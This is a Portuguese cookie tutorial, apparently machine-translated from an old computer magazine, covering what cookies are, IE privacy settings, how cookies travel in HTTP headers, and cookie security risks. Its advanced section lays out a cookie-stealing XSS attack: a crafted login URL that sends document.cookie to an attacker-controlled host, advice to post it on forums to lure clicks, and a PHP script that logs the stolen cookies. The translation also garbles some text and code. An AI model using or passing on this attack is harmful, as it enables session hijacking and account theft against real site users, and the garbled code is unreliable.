Cookie significa sobremesa pequena em inglês, e sempre podemos ver essa palavra no navegador. Como a comida pode ser relacionada ao navegador? Ao navegar em um site onde você já fez login, poderá ver a seguinte mensagem na página da web: Olá XX, é muito amigável, é como comer uma pequena sobremesa. Na verdade, isso é conseguido acessando um arquivo em seu host, portanto, esse arquivo também é chamado de cookie. Quer saber tudo sobre biscoitos? Dê uma olhada abaixo!
1. Entenda o Cookie Objetos aplicáveis: Leitores iniciantes
Cookie é um pequeno arquivo de texto que o site armazena em sua máquina quando você navega em um site. Ele registra seu ID de usuário, senha, páginas da web navegadas, tempo gasto e outras informações, quando você chega. ao site novamente, o site obtém suas informações relevantes lendo o cookie e pode realizar as ações correspondentes, como exibir um slogan de boas-vindas na página ou permitir que você navegue diretamente sem inserir seu ID ou senha. . Você pode visualizar todos os cookies salvos em seu computador selecionando "Configurações/Exibir arquivos" na guia "Geral" de "Ferramentas/Opções da Internet" no IE. Esses arquivos geralmente são nomeados no formato usuário@domínio , onde usuário é seu nome de usuário local e domínio é o nome de domínio do site que você está visitando. Se você utiliza o navegador NetsCape, ele fica armazenado em "C:PROGRAMFILESNETSCAPEUSERS". Diferente do IE, o NETSCAPE utiliza um arquivo Cookie para registrar os cookies de todos os sites.
Para garantir a segurança da Internet, precisamos definir os cookies de forma adequada. Abra a guia "Privacidade" em "Ferramentas/Opções da Internet" (observe que esta configuração só existe no IE6.0, outras versões do IE podem clicar em "Nível personalizado" na guia "Segurança" do botão "Ferramentas/Opções da Internet" para fazer ajustes simples) para ajustar o nível de segurança dos cookies. Normalmente, você pode ajustar o controle deslizante para a posição “médio-alto” ou “alto”. A maioria dos sites de fórum exige o uso de informações de cookies. Se você nunca vai a esses locais, pode ajustar o nível de segurança para “Bloquear todos os cookies”. Se quiser apenas bloquear cookies de sites individuais, você pode clicar no botão "Editar" para adicionar à lista os sites que deseja bloquear. Na opção do botão "Avançado", você pode definir cookies primários e cookies de terceiros. Cookies primários são cookies do site que você está navegando e cookies de terceiros não são cookies enviados a você pelo site que você está navegando. navegação. Normalmente você tem que escolher "Rejeitar" para cookies de terceiros, conforme mostrado na Figura 1. Se precisar salvar cookies, você pode usar a função "Importar e Exportar" do IE, abrir "Arquivo/Importar e Exportar" e seguir as instruções.
A maior parte do conteúdo do cookie é criptografada, então parece-nos que é apenas uma combinação sem sentido de letras e números. Somente o manipulador CGI do servidor conhece seu verdadeiro significado. Podemos visualizar mais conteúdo através de algum software. As informações dos cookies visualizadas usando o software Cookie Pal são mostradas na Figura 2. Ele nos fornece o conteúdo de Servidor, Expira, Nome, Valor e outras opções. Entre eles, Servidor é o site que armazena cookies, Expira registra o tempo e vida útil do cookie e os campos Nome e valor são dados específicos (este jornal tem uma introdução detalhada a este software na edição 10, página 42).
Endereço para download: http://www.cbifamily.com/down/200411/cfnetwork/cp1.exe .
2. Processo de entrega de cookies Objetos aplicáveis: Leitores intermediários Ao digitar a URL de um site na barra de endereço do navegador, o navegador enviará uma solicitação para ler a página da web ao site e exibirá o resultado no monitor. Neste momento, a página procura o arquivo Cookie definido pelo site da Amazon em seu computador. Se for encontrado, o navegador enviará os dados do arquivo Cookie junto com o URL inserido anteriormente para o servidor Amazon. Quando o servidor receber os dados do cookie, ele recuperará seu ID, seus registros de compras, preferências pessoais e outras informações em seu banco de dados, registrará o novo conteúdo e o adicionará ao banco de dados e aos arquivos de cookies. Se nenhum cookie for detectado ou as informações do seu cookie não corresponderem às informações do banco de dados, significa que você está navegando no site pela primeira vez e o programa CGI do servidor criará novas informações de ID para você e as salvará no banco de dados.
Os cookies são transferidos usando as informações do cabeçalho HTTP no código da página da web. Os cookies podem ser transferidos com cada solicitação de página da web feita pelo navegador, por exemplo, quando o navegador abre ou atualiza a página da web. O servidor adiciona o cookie às informações do cabeçalho HTTP da página da web e transmite os dados da página da web de volta ao seu navegador. O navegador escolherá se deseja salvar esses dados com base nas configurações de cookies do seu computador. Se o navegador não permitir o salvamento de cookies, os dados desaparecerão após fechar o navegador. O tempo que os cookies ficam armazenados no seu computador é diferente, o que é determinado pelas configurações do servidor. Os cookies possuem um atributo Expires (período de validade), que determina o tempo de armazenamento do cookie. O servidor pode alterar o tempo de armazenamento do cookie definindo o valor do campo Expires. Se este atributo não estiver definido, os cookies só serão válidos durante a navegação na web. Se você fechar o navegador, esses cookies desaparecerão automaticamente. Este é o caso da maioria dos sites. Normalmente, um cookie contém os campos Servidor, Expira, Nome e Valor. Somente os campos Nome e Valor são úteis para o servidor. O conteúdo de Expira e outros campos servem apenas para informar ao navegador como processar esses cookies.
3. Implementação da programação de cookies Objetos aplicáveis: Leitores avançados A maioria das linguagens de programação da web fornece suporte para Cookies. Como JavaScript, VBScript, Delphi, ASP, SQL, PHP, C#, etc. Nessas linguagens de programação orientadas a objetos, a utilização de programação do Cookie é basicamente semelhante. O processo geral é: primeiro crie um objeto Cookie (Objeto) e, em seguida, use a função de controle para atribuir, ler, escrever e outras operações ao Cookie. Então, como obter informações sensíveis nos cookies de outros usuários através de código? Segue uma breve introdução.
Este método tem duas etapas principais: primeiro, localize o site que você precisa para coletar cookies, analise-o e construa a URL, em seguida, compile o código PHP para coletar cookies e coloque-o em um site que você possa controlar, sem saber; o código pode ser executado depois que o usuário clica no URL que você construiu. Vejamos o processo de implementação específico abaixo.
1. Analise e construa o URL.
Primeiro abra o site onde queremos coletar os cookies. Aqui assumimos que é http://www.XXX.net . Faça login no site e digite o nome de usuário "<A1>" (. sem aspas) para analisar os dados e capturar os pacotes, obtenha um código no formato "http://www.XXX.net/txl/login/login.pl?username=<A1>&passwd=&ok.x. =28&ok.y=6", substitua "<A1>" Tente novamente para "<script>alert(document.cookie)</script>"; se a execução for bem-sucedida, comece a construir a URL: "http://www .XXX.net/txl/login/login.pl?username=< script>window.open(" http://www.cbifamily.org/cbi.php?"%2Bdocument.cookie)</script>&passwd=&ok .x=28&ok.y=6 ". Entre eles, http:///www.cbifamily.org/cbi.php é um script em um determinado host que você pode controlar. Deve-se observar que "%2B" é a codificação URL do símbolo "+", pois "+" será tratado como um espaço. A URL pode ser postada no fórum para induzir outras pessoas a clicarem nela.
2. Prepare o script PHP.
A função deste script é coletar arquivos de cookies. O conteúdo específico é o seguinte:
<?php
$info = getenv("QUERY_STRING");
if ($informações){
$fp = fopen("info.txt","a");
fwrite($fp,$info."n");
fclose($fp);
}
header("Localização: http://www.downcodes.com ");
?>
4. Questões de segurança de cookies Objetos aplicáveis: Todos os leitores que desejam estar seguros on-line
1. Enganação de cookies
Os cookies registram informações como IDs de contas de usuários e senhas. Se transmitidos on-line, a criptografia MD5 geralmente é usada. Mesmo que as informações criptografadas sejam interceptadas por algumas pessoas com segundas intenções na Internet, elas não serão capazes de entendê-las porque tudo o que veem são letras e números sem sentido. No entanto, o problema agora é que as pessoas que interceptam cookies não precisam saber o significado dessas strings. Elas só precisam enviar os cookies de outras pessoas ao servidor e, se conseguirem passar na verificação, podem fingir ser a identidade da vítima e. faça login no site. Este método é chamado de falsificação de cookies. O pré-requisito para a falsificação de cookies é que exista uma vulnerabilidade no programa de verificação do servidor e o impostor queira obter as informações do cookie da pessoa que está sendo personificada. É muito difícil para o atual programa de verificação de sites excluir todos os logins ilegais. Por exemplo, a linguagem usada para escrever o programa de verificação pode conter lacunas. Além disso, é muito fácil obter cookies de outras pessoas. Você pode conseguir isso escrevendo um pequeno código em uma linguagem que suporte cookies (veja detalhes no método 3). pode ser coletado. Se um fórum permite código HTML ou permite o uso de tags Flash, você pode usar essas tecnologias para coletar o código do cookie e colocá-lo no fórum, depois dar à postagem um tópico atraente e escrever conteúdo interessante, e você pode coletar rapidamente um grande número de biscoitos. No fórum, as senhas de muitas pessoas foram roubadas por esse método. Quanto a como evitá-lo, atualmente não existe uma cura específica. Só podemos usar os métodos usuais de proteção. Não use senhas importantes em fóruns, não use a função do IE para salvar senhas automaticamente e tente não fazer login em sites. onde você não conhece os detalhes.
2. Perigos ocultos do código Flash
Existe uma função getURL() no Flash que pode usar esta função para abrir automaticamente uma página da web específica. Portanto, pode levar você a um site que contém código malicioso. Por exemplo, quando você está curtindo uma bela animação em Flash em seu computador, o código no quadro da animação pode ter sido conectado silenciosamente à Internet e aberto uma página muito pequena contendo um código especial. Esta página pode coletar seus cookies e fazer outras coisas, como plantar Trojans em sua máquina ou até mesmo formatar seu disco rígido, etc. Os sites não podem proibir esse comportamento do Flash porque é o comportamento interno dos arquivos Flash. O que podemos fazer é tentar abrir o firewall se você estiver navegando localmente. Se o firewall solicitar que você não saiba os pacotes de dados enviados, é melhor bani-los. Se você quiser se divertir na Internet, o melhor é encontrar alguns sites grandes e conhecidos.